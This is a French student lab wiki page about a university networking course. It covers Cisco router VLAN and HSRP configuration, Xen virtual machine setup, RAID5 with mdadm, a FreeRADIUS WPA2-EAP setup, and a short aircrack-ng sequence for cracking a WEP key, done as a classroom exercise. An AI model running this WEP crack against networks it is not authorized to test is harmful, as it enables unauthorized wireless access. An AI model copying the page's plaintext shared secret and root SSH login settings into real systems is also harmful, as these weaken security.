  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
